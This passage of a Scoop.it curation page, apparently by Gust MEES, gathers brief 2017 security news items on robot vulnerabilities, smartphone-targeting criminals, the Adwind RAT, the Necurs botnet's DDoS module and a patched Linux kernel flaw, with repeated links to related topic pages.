In total, researchers said they had discovered almost 50 cybersecurity vulnerabilities across the SoftBank Robotics' NAO and Pepper robots, UBTECH Robotics' Alpha 1S and Alpha 2 robots, the ROBOTIS ROBOTIS OP2 and THORMANG3 robots, Universal Robots' UR3, UR5, UR10 robots, Rethink Robotics' Baxter and Sawyer robots and several robots using technology by Asratec Corp.

 

Researchers spent six months testing mobile applications, robot operating systems, firmware images, and other software in order to identify the flaws in the robots, which for the purposes of maintaining security haven't be specifically detailed in IOActive's newly released Hacking Robots Before Skynet report.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=iot

 

No comment yet.
Scooped by Gust MEES
March 2, 2017 2:39 AM
Scoop.it!

Switch from PC to phones: Cyber criminals focus on data-rich smartphones | #MobileSecurity #CyberSecurity

Switch from PC to phones: Cyber criminals focus on data-rich smartphones | #MobileSecurity #CyberSecurity | ICT Security-Sécurité PC et Internet | Scoop.it
(AFP) Smartphones have become a mine of personal information, holding bank data, credit card information and addresses, making them the preferred target for cyber criminals, experts warn.

"Cyber criminals go where there is value, and they have understood that the smartphone has become the preferred terminal for online shopping and payment," said Tanguy de Coatpont, head of the French branch of international anti-virus firm Kaspersky Lab at the Mobile World Congress in Barcelona.

Ransom-ware, which seizes control of computers and demands money to unblock users' data, has already started to target smartphones.

Now the devices are also being sought after as a gateway to key information about its user, experts at the phone industry's largest annual trade fair said.

 

Learn more / En savoir plus / Mehr erfahren:

 

 

https://gustmees.wordpress.com/2014/03/05/often-asked-questions-are-there-cyber-security-dangers-with-apps-and-whats-about-privacy/

 

http://www.scoop.it/t/apps-for-any-use-mostly-for-education-and-free/?tag=Mobile+Security

 

http://www.scoop.it/t/securite-pc-et-internet/

 

Gust MEES's insight:
(AFP) Smartphones have become a mine of personal information, holding bank data, credit card information and addresses, making them the preferred target for cyber criminals, experts warn.

"Cyber criminals go where there is value, and they have understood that the smartphone has become the preferred terminal for online shopping and payment," said Tanguy de Coatpont, head of the French branch of international anti-virus firm Kaspersky Lab at the Mobile World Congress in Barcelona.

Ransom-ware, which seizes control of computers and demands money to unblock users' data, has already started to target smartphones.

Now the devices are also being sought after as a gateway to key information about its user, experts at the phone industry's largest annual trade fair said.

 

Learn more / En savoir plus / Mehr erfahren:

 

 

https://gustmees.wordpress.com/2014/03/05/often-asked-questions-are-there-cyber-security-dangers-with-apps-and-whats-about-privacy/

 

http://www.scoop.it/t/apps-for-any-use-mostly-for-education-and-free/?tag=Mobile+Security

 

http://www.scoop.it/t/securite-pc-et-internet/

 

No comment yet.
Scooped by Gust MEES
February 28, 2017 10:01 AM
Scoop.it!

1500 companies in over 100 countries hit by malicious Adwind backdoor RAT | #CyberSecurity 

1500 companies in over 100 countries hit by malicious Adwind backdoor RAT | #CyberSecurity  | ICT Security-Sécurité PC et Internet | Scoop.it
More than 1,500 companies in over 100 countries have suffered an infection at the hands of the Adwind Remote Access Tool (RAT).

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Backdoor

 

Gust MEES's insight:
More than 1,500 companies in over 100 countries have suffered an infection at the hands of the Adwind Remote Access Tool (RAT).

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Backdoor

 

No comment yet.
Scooped by Gust MEES
February 27, 2017 12:05 PM
Scoop.it!

World's Largest Spam Botnet Adds DDoS Feature | #CyberSecurity #Awareness

World's Largest Spam Botnet Adds DDoS Feature | #CyberSecurity #Awareness | ICT Security-Sécurité PC et Internet | Scoop.it
Necurs, the world's largest spam botnet with nearly 5 million infected bots, of which one million active each day, has added a new module that can be used for launching DDoS attacks.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Botnets

 

No comment yet.
Scooped by Gust MEES
February 23, 2017 10:26 AM
Scoop.it!

Linux's decade-old flaw: Major distros move to patch serious kernel bug | #CyberSecurity #NobodyIsPerfect

Linux's decade-old flaw: Major distros move to patch serious kernel bug | #CyberSecurity #NobodyIsPerfect | ICT Security-Sécurité PC et Internet | Scoop.it
Google fuzzer helps find 11-year-old memory-corruption flaw in the Linux kernel.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Linux

 

Gust MEES's insight:
Google fuzzer helps find 11-year-old memory-corruption flaw in the Linux kernel.

 

Learn more / En savoir plus / Mehr erfahren:

 

http://www.scoop.it/t/securite-pc-et-internet/?&tag=Linux

 

No comment yet.